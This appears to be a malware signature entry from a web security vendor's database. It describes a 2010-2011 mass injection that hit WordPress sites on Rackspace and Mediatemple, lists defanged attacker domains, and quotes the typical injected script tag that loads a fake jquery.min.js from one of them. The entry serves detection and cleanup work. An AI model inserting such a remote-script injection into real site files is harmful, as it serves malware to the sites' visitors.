Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.rks_injection.2

Description: Malware injections related to massive hacks of websites hosted on Rackspace and Mediatemple back in 2010-2011

Loads malware from

hxxp://m3h.toolbarinc[.]com
hxxp://w7c5lrhqu .newsapis[.]us
hxxp://brown.smartenergymodel[.]com/js/ jquery.min.js
hxxp://azure.smartenergymodel[.]com /js/jquery.min.js
hxxp://r91nu.emapis[.]org /js / jquery.min.js
hxxp://d0j.emapis[.]org/js/ jquery.min.js
hxxp://khaki.smartenergymodel[.]com/ js/ jquery.min.js
hxxp://purple.gaindirectory[.]org/ js/ jquery.min.js
And other domains.

Typical injected code

< script src = hxxp:// azure.smartenergymodel[.]com /js/jquery.min.js> 

It infects .php, .html and .js files.

Related links: http://blog.sucuri.net/2010/06/mass-attack-of-wordpress-blogs-on-rackspace.html
http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpress-blogs-on-rackspace/


Affecting: WordPress websites. Mostly on Rackspace and Mediatemple.

Mitigation
How to clean a hacked WordPress site


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb